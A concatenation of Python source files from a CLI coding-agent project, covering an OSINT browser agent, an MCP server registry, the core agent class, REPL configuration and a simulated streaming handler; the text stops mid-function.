                    f.write("-" * 50 + "\n")
                    f.write(content)

                # Extract artifacts from browser content
                artifacts = self._base_osint.extractor.extract_all(content, url)

                evidence = BrowserEvidence(
                    url=state.url,
                    title=state.title,
                    screenshot_path=str(screenshot_path),
                    content_path=str(content_path),
                    artifacts=artifacts,
                    metadata={"index": i},
                )

                evidence_list.append(evidence)
                self._evidence.append(evidence)

            except Exception as e:
                # Log error but continue
                continue

        return evidence_list

    async def browse_url(
        self,
        url: str,
        actions: Optional[list[BrowserAction]] = None,
    ) -> BrowserResult:
        """
        Browse a specific URL with optional actions.

        Args:
            url: URL to visit
            actions: Optional actions to perform

        Returns:
            BrowserResult
        """
        if not BROWSER_AVAILABLE:
            return BrowserResult(
                success=False,
                message="Browser automation not available",
                error="playwright not installed",
            )

        try:
            await self.start_browser()

            # Navigate
            state = await self._browser.navigate(url)

            # Execute actions if provided
            if actions:
                result = await self._browser.execute_actions(actions)
                return result

            # Take screenshot
            screenshot = await self._browser.screenshot()

            return BrowserResult(
                success=True,
                message=f"Visited: {state.title}",
                screenshots=[screenshot],
                extracted_content=state.page_content,
                final_url=state.url,
            )

        except Exception as e:
            return BrowserResult(
                success=False,
                message=f"Browser failed: {str(e)}",
                error=str(e),
            )

    def check_status(self) -> dict[str, Any]:
        """Get agent status."""
        base_status = self._base_osint.check_status()

        return {
            **base_status,
            "agent_id": self.agent_id,
            "agent_name": self.agent_name,
            "browser_available": BROWSER_AVAILABLE,
            "browser_active": self._browser is not None,
            "subordinates": len(self._subordinates),
            "evidence_captured": len(self._evidence),
            "current_investigation": self._current_investigation,
        }

    def _format_result(self, result: InvestigationResult) -> str:
        """Format investigation result."""
        lines = [
            "🔍 OSINT Investigation Complete",
            f"Query: {result.query}",
            f"Results: {result.results_count} found, {result.scraped_count} scraped",
            f"Artifacts: {result.artifacts_count} extracted",
            f"Duration: {result.duration:.1f}s",
        ]

        if isinstance(result, EnhancedInvestigationResult):
            lines.append(f"Browser Evidence: {len(result.browser_evidence)} pages")
            lines.append(f"Agents Used: {result.total_agents_used}")

        if result.report_path:
            lines.append(f"Report: {result.report_path}")

        return "\n".join(lines)

    async def cleanup(self) -> None:
        """Clean up resources."""
        await self.stop_browser()
        await super().cleanup()



"""
MCP Server Registry - Manage multiple MCP server configurations

Provides:
- Persistent storage of MCP server configurations
- Connection management for multiple servers
- Tool aggregation from all connected servers
"""

import asyncio
import json
from pathlib import Path
from typing import Any, Optional

from groknroll.mcp.client import MCPClient
from groknroll.mcp.types import (
    MCPServerConfig,
    MCPServerInfo,
    MCPTool,
    MCPToolResult,
)


class MCPRegistry:
    """
    Registry for managing MCP server configurations and connections

    Stores configurations in ~/.config/groknroll/mcp.json and project-level
    .groknroll/mcp.json files.

    Example:
        registry = MCPRegistry()

        # Add a server
        config = MCPServerConfig(
            name="filesystem",
            command="npx",
            args=["-y", "@modelcontextprotocol/server-filesystem", "/path"]
        )
        registry.add_server(config)

        # Connect and use
        await registry.connect_all()
        tools = registry.list_all_tools()
        result = await registry.call_tool("filesystem", "read_file", path="/etc/hosts")
    """

    # Config file locations
    GLOBAL_CONFIG = Path.home() / ".config" / "groknroll" / "mcp.json"
    PROJECT_CONFIG = ".groknroll/mcp.json"

    def __init__(self, project_path: Optional[Path] = None):
        """
        Initialize MCP registry

        Args:
            project_path: Project directory (for project-level configs)
        """
        self.project_path = project_path or Path.cwd()
        self._configs: dict[str, MCPServerConfig] = {}
        self._clients: dict[str, MCPClient] = {}
        self._tools_cache: dict[str, list[MCPTool]] = {}

        # Load configs
        self._load_configs()

    def _load_configs(self) -> None:
        """Load configurations from global and project config files"""
        # Load global config
        if self.GLOBAL_CONFIG.exists():
            self._load_config_file(self.GLOBAL_CONFIG)

        # Load project config (overrides global)
        project_config = self.project_path / self.PROJECT_CONFIG
        if project_config.exists():
            self._load_config_file(project_config)

    def _load_config_file(self, path: Path) -> None:
        """Load configurations from a specific file"""
        try:
            with open(path) as f:
                data = json.load(f)

            for server_data in data.get("mcpServers", []):
                config = MCPServerConfig.from_dict(server_data)
                self._configs[config.name] = config
        except (json.JSONDecodeError, KeyError, ValueError):
            # Invalid config file - skip
            pass

    def _save_configs(self, global_config: bool = True) -> None:
        """Save configurations to config file"""
        path = self.GLOBAL_CONFIG if global_config else self.project_path / self.PROJECT_CONFIG

        # Ensure directory exists
        path.parent.mkdir(parents=True, exist_ok=True)

        # Build config data
        data = {"mcpServers": [config.to_dict() for config in self._configs.values()]}

        # Write to file
        with open(path, "w") as f:
            json.dump(data, f, indent=2)

    def add_server(
        self,
        config: MCPServerConfig,
        save: bool = True,
        global_config: bool = True,
    ) -> None:
        """
        Add an MCP server configuration

        Args:
            config: Server configuration
            save: Whether to persist the configuration
            global_config: Save to global config (vs project config)
        """
        self._configs[config.name] = config

        if save:
            self._save_configs(global_config)

    def remove_server(
        self,
        name: str,
        save: bool = True,
        global_config: bool = True,
    ) -> None:
        """
        Remove an MCP server configuration

        Args:
            name: Server name
            save: Whether to persist the change
            global_config: Save to global config (vs project config)
        """
        if name not in self._configs:
            raise KeyError(f"Server '{name}' not found")

        # Disconnect if connected
        if name in self._clients:
            asyncio.create_task(self._clients[name].disconnect())
            del self._clients[name]
            self._tools_cache.pop(name, None)

        del self._configs[name]

        if save:
            self._save_configs(global_config)

    def get_server(self, name: str) -> Optional[MCPServerConfig]:
        """Get server configuration by name"""
        return self._configs.get(name)

    def list_servers(self) -> list[MCPServerConfig]:
        """List all server configurations"""
        return list(self._configs.values())

    async def connect(self, name: str) -> MCPServerInfo:
        """
        Connect to a specific MCP server

        Args:
            name: Server name

        Returns:
            Server information

        Raises:
            KeyError: If server not found
            RuntimeError: If connection fails
        """
        config = self._configs.get(name)
        if not config:
            raise KeyError(f"Server '{name}' not found")

        if not config.enabled:
            raise RuntimeError(f"Server '{name}' is disabled")

        # Disconnect existing client if any
        if name in self._clients:
            await self._clients[name].disconnect()

        # Create and connect new client
        client = MCPClient(config)
        server_info = await client.connect()

        self._clients[name] = client

        # Cache tools
        tools = await client.list_tools()
        self._tools_cache[name] = tools

        return server_info

    async def disconnect(self, name: str) -> None:
        """
        Disconnect from a specific MCP server

        Args:
            name: Server name
        """
        if name in self._clients:
            await self._clients[name].disconnect()
            del self._clients[name]
            self._tools_cache.pop(name, None)

    async def connect_all(self) -> dict[str, MCPServerInfo]:
        """
        Connect to all enabled MCP servers

        Returns:
            Dictionary of server name to server info
        """
        results = {}

        for name, config in self._configs.items():
            if config.enabled:
                try:
                    info = await self.connect(name)
                    results[name] = info
                except Exception:
                    # Log error but continue with other servers
                    pass

        return results

    async def disconnect_all(self) -> None:
        """Disconnect from all MCP servers"""
        for name in list(self._clients.keys()):
            await self.disconnect(name)

    def is_connected(self, name: str) -> bool:
        """Check if a server is connected"""
        return name in self._clients and self._clients[name].is_connected

    def list_connected_servers(self) -> list[str]:
        """List names of connected servers"""
        return [name for name, client in self._clients.items() if client.is_connected]

    def list_all_tools(self) -> dict[str, list[MCPTool]]:
        """
        List all tools from all connected servers

        Returns:
            Dictionary of server name to list of tools
        """
        return dict(self._tools_cache)

    def get_tools(self, server: str) -> list[MCPTool]:
        """
        Get tools from a specific server

        Args:
            server: Server name

        Returns:
            List of tools
        """
        return self._tools_cache.get(server, [])

    async def call_tool(
        self,
        server: str,
        tool: str,
        **arguments: Any,
    ) -> MCPToolResult:
        """
        Call a tool on a specific server

        Args:
            server: Server name
            tool: Tool name
            **arguments: Tool arguments

        Returns:
            Tool execution result

        Raises:
            KeyError: If server not found
            RuntimeError: If server not connected
        """
        if server not in self._clients:
            raise KeyError(f"Server '{server}' not connected")

        client = self._clients[server]
        return await client.call_tool(tool, **arguments)

    def find_tool(self, tool_name: str) -> Optional[tuple[str, MCPTool]]:
        """
        Find a tool by name across all servers

        Args:
            tool_name: Tool name to find

        Returns:
            Tuple of (server_name, tool) or None if not found
        """
        for server_name, tools in self._tools_cache.items():
            for tool in tools:
                if tool.name == tool_name:
                    return (server_name, tool)
        return None

    async def call_tool_by_name(
        self,
        tool_name: str,
        **arguments: Any,
    ) -> MCPToolResult:
        """
        Call a tool by name (finds the server automatically)

        Args:
            tool_name: Tool name
            **arguments: Tool arguments

        Returns:
            Tool execution result

        Raises:
            KeyError: If tool not found
        """
        result = self.find_tool(tool_name)
        if not result:
            raise KeyError(f"Tool '{tool_name}' not found in any connected server")

        server_name, tool = result
        return await self.call_tool(server_name, tool_name, **arguments)

    def enable_server(self, name: str, save: bool = True) -> None:
        """Enable a server"""
        if name not in self._configs:
            raise KeyError(f"Server '{name}' not found")

        self._configs[name].enabled = True

        if save:
            self._save_configs()

    def disable_server(self, name: str, save: bool = True) -> None:
        """Disable a server"""
        if name not in self._configs:
            raise KeyError(f"Server '{name}' not found")

        self._configs[name].enabled = False

        # Disconnect if connected
        if name in self._clients:
            asyncio.create_task(self.disconnect(name))

        if save:
            self._save_configs()


# Singleton instance
_registry: Optional[MCPRegistry] = None


def get_registry(project_path: Optional[Path] = None) -> MCPRegistry:
    """
    Get the global MCP registry instance

    Args:
        project_path: Project directory (only used on first call)

    Returns:
        MCPRegistry singleton instance
    """
    global _registry
    if _registry is None:
        _registry = MCPRegistry(project_path)
    return _registry


def reset_registry() -> None:
    """Reset the global MCP registry (for testing)"""
    global _registry
    _registry = None



"""
groknroll Web Interface - HTTP API and WebSocket support

Provides a web-based interface for interacting with groknroll agents.

Example usage:
    # Start the server
    groknroll serve --port 8080

    # Or programmatically
    from groknroll.web import run_server
    run_server(host="0.0.0.0", port=8080)

    # Create custom app
    from groknroll.web import create_app
    app = create_app()
"""

from groknroll.web.app import create_app, run_server
from groknroll.web.session_manager import (
    WebSession,
    WebSessionManager,
    get_session_manager,
    reset_session_manager,
)
from groknroll.web.types import (
    AgentType,
    ChatRequest,
    ChatResponse,
    ErrorResponse,
    HealthResponse,
    Message,
    MessageRole,
    ModelInfo,
    ProviderInfo,
    SessionCreateRequest,
    SessionDetail,
    SessionExportRequest,
    SessionInfo,
    SessionStatus,
    StatsResponse,
    StreamChunk,
    ToolCallRequest,
    ToolCallResult,
    ToolInfo,
)

__all__ = [
    # Types
    "AgentType",
    "ChatRequest",
    "ChatResponse",
    "ErrorResponse",
    "HealthResponse",
    "Message",
    "MessageRole",
    "ModelInfo",
    "ProviderInfo",
    "SessionCreateRequest",
    "SessionDetail",
    "SessionExportRequest",
    "SessionInfo",
    "SessionStatus",
    "StatsResponse",
    "StreamChunk",
    "ToolCallRequest",
    "ToolCallResult",
    "ToolInfo",
    # Session management
    "WebSession",
    "WebSessionManager",
    "get_session_manager",
    "reset_session_manager",
    # App
    "create_app",
    "run_server",
]



"""
GroknrollAgent - The Ultimate CLI Coding Agent

Main orchestrator combining RLM, project context, and autonomous workflows.
"""

from dataclasses import dataclass
from pathlib import Path
from typing import Any, Optional

from groknroll.core.context import ProjectContext
from groknroll.core.rlm_integration import RLMConfig, RLMIntegration
from groknroll.storage.database import Database


@dataclass
class AgentConfig:
    """Configuration for GroknrollAgent"""

    model: str = "gpt-4o-mini"
    max_cost: float = 5.0
    timeout: int = 300
    auto_index: bool = False  # Disabled by default for faster startup
    fsd_mode: bool = False  # FSD Mode: skip ALL permission checks


class GroknrollAgent:
    """
    The Ultimate CLI Coding Agent

    Features:
    - Unlimited context via RLM
    - Project-aware with persistent state
    - Autonomous multi-step workflows
    - Self-correcting and verifying
    - Local and private
    - FSD Mode for skipping permission checks
    """

    def __init__(
        self,
        project_path: Optional[Path] = None,
        config: Optional[AgentConfig] = None,
        fsd_mode: bool = False,
    ):
        """
        Initialize groknroll agent

        Args:
            project_path: Path to project (uses current dir if None)
            config: Agent configuration
            fsd_mode: FSD Mode - skip ALL permission checks (dangerous!)
        """
        self.config = config or AgentConfig()

        # FSD mode can be set via parameter or config
        self.fsd_mode = fsd_mode or self.config.fsd_mode

        # Set project path
        self.project_path = project_path or Path.cwd()
        if not self.project_path.exists():
            raise ValueError(f"Project path does not exist: {self.project_path}")

        # Initialize components
        self.db = Database()
        self.context = ProjectContext(self.project_path, self.db)

        # Initialize RLM
        rlm_config = RLMConfig(
            model=self.config.model,
            max_cost=self.config.max_cost,
            timeout_seconds=self.config.timeout,
        )
        self.rlm = RLMIntegration(rlm_config)

        # Auto-index if configured
        if self.config.auto_index:
            self._ensure_indexed()

    def _ensure_indexed(self) -> None:
        """Ensure project is indexed"""
        overview = self.context.get_project_overview()

        # Index if never indexed or very old
        if overview["total_files"] == 0:
            print("Indexing project for first time...")
            stats = self.context.index_project()
            print(f"✓ Indexed {stats['indexed']} files ({stats['total_lines']:,} lines)")

    # =========================================================================
    # Core Chat & Analysis
    # =========================================================================

    def chat(self, message: str, context: Optional[dict[str, Any]] = None) -> str:
        """
        Chat with agent about project

        Args:
            message: User message
            context: Additional context

        Returns:
            Agent response
        """
        # Add project context
        project_context = {
            "project_name": self.context.project.name,
            "project_path": str(self.project_path),
            "total_files": self.context.project.total_files,
            **(context or {}),
        }

        # Execute with RLM
        result = self.rlm.complete(task=message, context=project_context)

        # Log execution
        if result.success:
            self.context.log_execution(
                task=message,
                response=result.response,
                total_cost=result.total_cost,
                total_time=result.total_time,
                iterations=result.iterations,
                status="success",
            )

        return result.response if result.success else f"Error: {result.error}"

    def analyze_code(
        self,
        file_path: Optional[Path] = None,
        code: Optional[str] = None,
        analysis_type: str = "review",
    ) -> dict[str, Any]:
        """
        Analyze code

        Args:
            file_path: Path to file (or provide code directly)
            code: Code string (or provide file_path)
            analysis_type: Type of analysis (review, security, complexity, etc)

        Returns:
            Analysis results
        """
        if file_path and not code:
            with open(file_path) as f:
                code = f.read()

        if not code:
            raise ValueError("Must provide either file_path or code")

        # Determine language
        language = "python"  # Default
        if file_path:
            language = self.context._detect_language(file_path.suffix)

        # Analyze with RLM
        result = self.rlm.analyze_code(code=code, analysis_type=analysis_type, language=language)

        if result.success:
            # Parse response into structured format
            analysis_results = {
                "analysis": result.response,
                "file": str(file_path) if file_path else None,
                "language": language,
                "type": analysis_type,
            }

            # Save analysis
            self.context.save_analysis(
                analysis_type=analysis_type,
                results=analysis_results,
                target_path=str(file_path) if file_path else None,
                execution_time=result.total_time,
            )

            return analysis_results

        return {"error": result.error}

    def analyze_project(self, detailed: bool = False) -> dict[str, Any]:
        """
        Analyze entire project

        Args:
            detailed: Include detailed analysis

        Returns:
            Project analysis
        """
        overview = self.context.get_project_overview()

        analysis_prompt = f"""Analyze this project:

Name: {overview["name"]}
Files: {overview["total_files"]}
Lines of Code: {overview["total_lines"]:,}

Languages:
{self._format_language_stats(overview["languages"])}

Provide:
1. Project structure assessment
2. Code quality overview
3. Potential issues
4. Recommendations
"""

        if detailed:
            analysis_prompt += "\n5. Detailed analysis of key files\n6. Architecture suggestions"

        result = self.rlm.complete(task=analysis_prompt, context=overview)

        if result.success:
            analysis_results = {
                "overview": overview,
                "analysis": result.response,
                "metrics": {
                    "cost": result.total_cost,
                    "time": result.total_time,
                    "iterations": result.iterations,
                },
            }

            self.context.save_analysis(
                analysis_type="project_overview",
                results=analysis_results,
                execution_time=result.total_time,
            )

            return analysis_results

        return {"error": result.error}

    # =========================================================================
    # Code Search & Understanding
    # =========================================================================

    def search_code(self, query: str, language: Optional[str] = None) -> list[dict[str, Any]]:
        """
        Search codebase

        Args:
            query: Search query
            language: Filter by language

        Returns:
            List of matching files
        """
        return self.context.search_files(query, language)

    def explain_code(self, file_path: Path) -> str:
        """Explain what code does"""
        with open(file_path) as f:
            code = f.read()

        language = self.context._detect_language(file_path.suffix)

        result = self.rlm.analyze_code(code=code, analysis_type="explain", language=language)

        return result.response if result.success else f"Error: {result.error}"

    # =========================================================================
    # Statistics & History
    # =========================================================================

    def get_stats(self) -> dict[str, Any]:
        """Get usage statistics"""
        exec_stats = self.context.get_execution_stats()
        overview = self.context.get_project_overview()

        return {
            "project": {
                "name": overview["name"],
                "files": overview["total_files"],
                "lines": overview["total_lines"],
                "languages": overview["languages"],
            },
            "executions": exec_stats,
            "rlm": self.rlm.get_stats(),
        }

    def get_history(self, limit: int = 10) -> list[dict[str, Any]]:
        """Get recent execution history"""
        executions = self.db.get_recent_executions(project_id=self.context.project.id, limit=limit)

        return [
            {
                "task": e.task[:100] + "..." if len(e.task) > 100 else e.task,
                "status": e.status,
                "cost": e.total_cost,
                "time": e.total_time,
                "timestamp": e.started_at,
            }
            for e in executions
        ]

    # =========================================================================
    # Project Management
    # =========================================================================

    def reindex_project(self, force: bool = True) -> dict[str, Any]:
        """Re-index project"""
        print("Re-indexing project...")
        stats = self.context.index_project(force=force)
        print(f"✓ Indexed {stats['indexed']} files")
        return stats

    def get_project_info(self) -> dict[str, Any]:
        """Get project information"""
        return self.context.get_project_overview()

    # =========================================================================
    # Utilities
    # =========================================================================

    def _format_language_stats(self, language_stats: dict[str, dict[str, int]]) -> str:
        """Format language statistics"""
        lines = []
        for lang, stats in sorted(
            language_stats.items(), key=lambda x: x[1]["lines"], reverse=True
        ):
            lines.append(f"  {lang}: {stats['files']} files, {stats['lines']:,} lines")
        return "\n".join(lines)

    def reset_rlm(self) -> None:
        """Reset RLM environment"""
        self.rlm.reset()

    def __repr__(self) -> str:
        return f"GroknrollAgent(project={self.project_path.name})"



"""
REPL Configuration and State Management

Provides configurable settings and state tracking for the Native REPL:
- REPLConfig: Configuration dataclass for customizable behavior
- REPLState: Runtime state tracking
- InputType: Classification of user input
- ProcessedInput: Preprocessed input with metadata

Examples:
    # Create custom config
    config = REPLConfig(
        model="gpt-4o",
        max_cost=10.0,
        stream_responses=True,
    )

    # Track state
    state = REPLState()
    state.current_agent = "plan"
"""

from dataclasses import dataclass, field
from enum import Enum, auto
from typing import Any, Optional

from groknroll.tui.session import Session


class InputType(Enum):
    """Classification of user input types"""

    NATURAL_LANGUAGE = auto()  # Regular text prompts to LLM
    SLASH_COMMAND = auto()  # /help, /save, /agent, etc.
    SHELL_COMMAND = auto()  # !ls, !git status, etc.
    FILE_REFERENCE = auto()  # @filename references


@dataclass
class ProcessedInput:
    """
    Preprocessed user input with metadata

    Attributes:
        original: The original unmodified input string
        processed: The processed/expanded input string
        input_type: Classification of the input
        file_references: List of file paths referenced with @
        metadata: Additional metadata about the input
    """

    original: str
    processed: str
    input_type: InputType
    file_references: list[str] = field(default_factory=list)
    metadata: dict[str, Any] = field(default_factory=dict)

    @property
    def is_command(self) -> bool:
        """Check if input is a command (slash or shell)"""
        return self.input_type in (InputType.SLASH_COMMAND, InputType.SHELL_COMMAND)

    @property
    def has_file_references(self) -> bool:
        """Check if input contains file references"""
        return len(self.file_references) > 0


@dataclass
class REPLConfig:
    """
    Configuration for the Native REPL

    All settings can be customized at initialization or runtime.

    Attributes:
        model: LLM model identifier (default: gpt-4o-mini)
        max_cost: Maximum cost limit in dollars (default: 5.0)
        stream_responses: Enable streaming responses (default: True)
        auto_save: Enable automatic session saving (default: True)
        auto_save_interval: Seconds between auto-saves (default: 60)
        default_agent: Default agent to use (default: build)
        history_limit: Maximum conversation history entries (default: 100)
        show_tokens: Show token usage in responses (default: False)
        show_cost: Show cost information (default: False)
        timeout: Default timeout for operations in seconds (default: 300)
        welcome_message: Custom welcome message (default: None)
        fsd_mode: FSD Mode - skip ALL permission checks (default: False)

    Example:
        config = REPLConfig(
            model="gpt-4o",
            max_cost=10.0,
            stream_responses=True,
            default_agent="plan",
        )
    """

    model: str = "gpt-4o-mini"
    max_cost: float = 5.0
    stream_responses: bool = True
    auto_save: bool = True
    auto_save_interval: int = 60
    default_agent: str = "build"
    history_limit: int = 100
    show_tokens: bool = False
    show_cost: bool = False
    timeout: int = 300
    welcome_message: Optional[str] = None
    fsd_mode: bool = False  # FSD Mode: skip ALL permission checks

    def validate(self) -> list[str]:
        """
        Validate configuration values

        Returns:
            List of validation error messages (empty if valid)
        """
        errors = []

        if self.max_cost <= 0:
            errors.append("max_cost must be positive")

        if self.auto_save_interval < 10:
            errors.append("auto_save_interval must be at least 10 seconds")

        if self.history_limit < 1:
            errors.append("history_limit must be at least 1")

        if self.timeout < 1:
            errors.append("timeout must be at least 1 second")

        if self.default_agent not in ("build", "plan", "oracle"):
            errors.append("default_agent must be build, plan, or oracle")

        return errors

    def to_dict(self) -> dict[str, Any]:
        """Convert to dictionary"""
        return {
            "model": self.model,
            "max_cost": self.max_cost,
            "stream_responses": self.stream_responses,
            "auto_save": self.auto_save,
            "auto_save_interval": self.auto_save_interval,
            "default_agent": self.default_agent,
            "history_limit": self.history_limit,
            "show_tokens": self.show_tokens,
            "show_cost": self.show_cost,
            "timeout": self.timeout,
            "welcome_message": self.welcome_message,
            "fsd_mode": self.fsd_mode,
        }

    @classmethod
    def from_dict(cls, data: dict[str, Any]) -> "REPLConfig":
        """Create from dictionary"""
        return cls(
            model=data.get("model", "gpt-4o-mini"),
            max_cost=data.get("max_cost", 5.0),
            stream_responses=data.get("stream_responses", True),
            auto_save=data.get("auto_save", True),
            auto_save_interval=data.get("auto_save_interval", 60),
            default_agent=data.get("default_agent", "build"),
            history_limit=data.get("history_limit", 100),
            show_tokens=data.get("show_tokens", False),
            show_cost=data.get("show_cost", False),
            timeout=data.get("timeout", 300),
            welcome_message=data.get("welcome_message"),
            fsd_mode=data.get("fsd_mode", False),
        )


@dataclass
class REPLState:
    """
    Runtime state for the Native REPL

    Tracks the current state of the REPL session including
    running status, current agent, and conversation history.

    Attributes:
        running: Whether the REPL is currently running
        current_agent: Name of the currently active agent
        session: Current session object (for persistence)
        conversation_history: List of conversation messages
        total_cost: Total cost incurred this session
        total_tokens: Total tokens used this session
        turn_count: Number of conversation turns

    Example:
        state = REPLState()
        state.running = True
        state.current_agent = "plan"
    """

    running: bool = True
    current_agent: str = "build"
    session: Optional[Session] = None
    conversation_history: list[dict[str, Any]] = field(default_factory=list)
    total_cost: float = 0.0
    total_tokens: int = 0
    turn_count: int = 0

    def add_message(self, role: str, content: str, **metadata: Any) -> None:
        """
        Add a message to conversation history

        Args:
            role: Message role (user, assistant, system)
            content: Message content
            **metadata: Additional metadata
        """
        message = {
            "role": role,
            "content": content,
            **metadata,
        }
        self.conversation_history.append(message)

        # Update turn count for user messages
        if role == "user":
            self.turn_count += 1

    def get_messages(self, limit: Optional[int] = None) -> list[dict[str, Any]]:
        """
        Get conversation history

        Args:
            limit: Maximum messages to return (newest)

        Returns:
            List of message dictionaries
        """
        if limit is None:
            return list(self.conversation_history)
        return list(self.conversation_history[-limit:])

    def clear_history(self) -> None:
        """Clear conversation history"""
        self.conversation_history.clear()
        self.turn_count = 0

    def update_usage(self, cost: float = 0.0, tokens: int = 0) -> None:
        """
        Update usage statistics

        Args:
            cost: Cost to add
            tokens: Tokens to add
        """
        self.total_cost += cost
        self.total_tokens += tokens

    def reset(self) -> None:
        """Reset state to initial values"""
        self.running = True
        self.current_agent = "build"
        self.session = None
        self.conversation_history.clear()
        self.total_cost = 0.0
        self.total_tokens = 0
        self.turn_count = 0

    def to_dict(self) -> dict[str, Any]:
        """Convert to dictionary"""
        return {
            "running": self.running,
            "current_agent": self.current_agent,
            "conversation_history": self.conversation_history,
            "total_cost": self.total_cost,
            "total_tokens": self.total_tokens,
            "turn_count": self.turn_count,
        }



"""
Streaming RLM Handler - Streaming responses from the LLM

Provides streaming completion for the REPL:
- Token-by-token output with callbacks
- Fallback chunking for non-streaming backends
- Integration with RLM core
- Cost and timing tracking

Examples:
    handler = StreamingRLMHandler(project_path=Path.cwd())

    # Stream with callback
    def on_token(token):
        print(token, end="", flush=True)

    result = await handler.complete_streaming(
        prompt="Explain this code",
        context={"file": "main.py"},
        on_token=on_token,
    )
    print(f"\nCost: ${result.cost:.4f}")
"""

import asyncio
import time
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Callable, Optional

from groknroll.core.agent import GroknrollAgent


@dataclass
class RLMResult:
    """
    Result from RLM completion

    Attributes:
        response: Complete response text
        cost: Cost in dollars
        tokens: Total tokens used
        input_tokens: Input tokens
        output_tokens: Output tokens
        execution_time: Time taken in seconds
        model: Model used
        success: Whether completion succeeded
        error: Error message if failed
    """

    response: str
    cost: float = 0.0
    tokens: int = 0
    input_tokens: int = 0
    output_tokens: int = 0
    execution_time: float = 0.0
    model: str = ""
    success: bool = True
    error: Optional[str] = None

    def to_dict(self) -> dict[str, Any]:
        """Convert to dictionary"""
        return {
            "response": self.response,
            "cost": self.cost,
            "tokens": self.tokens,
            "input_tokens": self.input_tokens,
            "output_tokens": self.output_tokens,
            "execution_time": self.execution_time,
            "model": self.model,
            "success": self.success,
            "error": self.error,
        }


class StreamingRLMHandler:
    """
    Handle streaming LLM completions

    Provides streaming responses with token callbacks for real-time
    display in the REPL.

    Example:
        handler = StreamingRLMHandler(project_path=Path.cwd())

        async def display_token(token: str) -> None:
            print(token, end="", flush=True)

        result = await handler.complete_streaming(
            prompt="Fix the bug",
            context={},
            on_token=display_token,
        )
    """

    def __init__(
        self,
        project_path: Optional[Path] = None,
        agent: Optional[GroknrollAgent] = None,
        model: str = "gpt-4o-mini",
        chunk_size: int = 10,
        chunk_delay: float = 0.02,
    ):
        """
        Initialize streaming handler

        Args:
            project_path: Project root path
            agent: GroknrollAgent instance (creates default if not provided)
            model: Default model to use
            chunk_size: Characters per chunk for fallback chunking
            chunk_delay: Delay between chunks in seconds
        """
        self.project_path = project_path or Path.cwd()
        self._agent = agent
        self.model = model
        self.chunk_size = chunk_size
        self.chunk_delay = chunk_delay

    @property
    def agent(self) -> GroknrollAgent:
        """Get or create the GroknrollAgent"""
        if self._agent is None:
            from groknroll.core.agent import AgentConfig

            # Disable auto_index for faster startup - index on demand instead
            config = AgentConfig(auto_index=False)
            self._agent = GroknrollAgent(self.project_path, config=config)
        return self._agent

    async def complete_streaming(
        self,
        prompt: str,
        context: Optional[dict] = None,
        on_token: Optional[Callable[[str], None]] = None,
        model: Optional[str] = None,
    ) -> RLMResult:
        """
        Complete with streaming token output

        Args:
            prompt: User prompt
            context: Additional context (file contents, etc.)
            on_token: Callback for each token
            model: Model to use (overrides default)

        Returns:
            RLMResult with complete response
        """
        start_time = time.time()
        used_model = model or self.model

        try:
            # Build full prompt with context
            full_prompt = self._build_prompt(prompt, context)

            # Get completion (RLM doesn't natively support streaming yet)
            # So we get the full response and chunk it
            response = self.agent.chat(full_prompt)

            # Simulate streaming by chunking the response
            if on_token:
                await self._stream_response(response, on_token)

            execution_time = time.time() - start_time

            # Estimate tokens (rough approximation)
            input_tokens = len(full_prompt.split()) * 1.3
            output_tokens = len(response.split()) * 1.3
            total_tokens = int(input_tokens + output_tokens)

            # Estimate cost (using gpt-4o-mini pricing as baseline)
            cost = self._estimate_cost(int(input_tokens), int(output_tokens), used_model)

            return RLMResult(
                response=response,
                cost=cost,
                tokens=total_tokens,
                input_tokens=int(input_tokens),
                output_tokens=int(output_tokens),
                execution_time=execution_time,
                model=used_model,
                success=True,
            )

        except Exception as e:
            execution_time = time.time() - start_time
            return RLMResult(
                response="",
                execution_time=execution_time,
                model=used_model,
                success=False,
                error=str(e),
            )

    def complete_streaming_sync(
        self,
        prompt: str,
        context: Optional[dict] = None,
        on_token: Optional[Callable[[str], None]] = None,
        model: Optional[str] = None,
    ) -> RLMResult:
        """
        Synchronous wrapper for complete_streaming

        Args:
            prompt: User prompt
            context: Additional context
            on_token: Token callback
            model: Model to use

        Returns:
            RLMResult
        """
        return asyncio.run(self.complete_streaming(prompt, context, on_token, model))

    async def _stream_response(
        self,
        response: str,
        on_token: Callable[[str], None],
    ) -> None:
        """
        Stream response in chunks

        Args:
            response: Full response text
            on_token: Callback for each chunk
        """
        for chunk in self._chunk_response(response):
            on_token(chunk)
            await asyncio.sleep(self.chunk_delay)

    def _chunk_response(self, response: str) -> list[str]:
        """
        Break response into chunks

        Args:
            response: Full response text

        Returns:
            List of chunks
        """
        chunks = []
        words = response.split(" ")
        current_chunk = []
        current_length = 0

        for word in words:
            if current_length + len(word) + 1 > self.chunk_size:
                if current_chunk:
                    chunks.append(" ".join(current_chunk) + " ")
                current_chunk = [word]
                current_length = len(word)
            else:
                current_chunk.append(word)
                current_length += len(word) + 1

        if current_chunk:
            chunks.append(" ".join(current_chunk))

        return chunks

    def _build_prompt(self, prompt: str, context: Optional[dict]) -> str:
        """
        Build full prompt with context

        Args:
            prompt: User prompt
            context: Additional context

        Returns:
            Full prompt string
        """
        if not context:
            return prompt

        context_parts = []

        # Add file contents
        if "files" in context:
            for file_path, content in context["files"].items():
                context_parts.append(f"File: {file_path}\n```\n{content}\n```")

        # Add other context
        for key, value in context.items():
            if key == "files":
                continue
            if isinstance(value, str):
                context_parts.append(f"{key}:\n{value}")

        if context_parts:
            context_str = "\n\n".join(context_parts)
            return f"Context:\n{context_str}\n\nTask: {prompt}"

        return prompt

    def _estimate_cost(
        self,
        input_tokens: int,
        output_tokens: int,
        model: str,
    ) -> float:
        """
        Estimate cost based on model pricing

        Args:
            input_tokens: Input token count
            output_tokens: Output token count
            model: Model name

        Returns:
            Estimated cost in dollars
        """
        # Pricing per 1M tokens (approximate)
        pricing = {
            "gpt-4o-mini": {"input": 0.15, "output": 0.60},
            "gpt-4o": {"input": 2.50, "output": 10.00},
            "gpt-4-turbo": {"input": 10.00, "output": 30.00},
            "claude-3-5-sonnet": {"input": 3.00, "output": 15.00},
            "claude-3-haiku": {"input": 0.25, "output": 1.25},
        }

        # Get pricing for model (default to gpt-4o-mini)
        model_pricing = pricing.get(model, pricing["gpt-4o-mini"])

        input_cost = (input_tokens / 1_000_000) * model_pricing["input"]
        output_cost = (output_tokens / 1_000_000) * model_pricing["output"]

        return input_cost + output_cost

    async def complete_with_tools(
        self,
        prompt: str,
        tools: list[dict],
        context: Optional[dict] = None,
        on_token: Optional[Callable[[str], None]] = None,
    ) -> RLMResult:
        """
        Complete with tool use support

        Args:
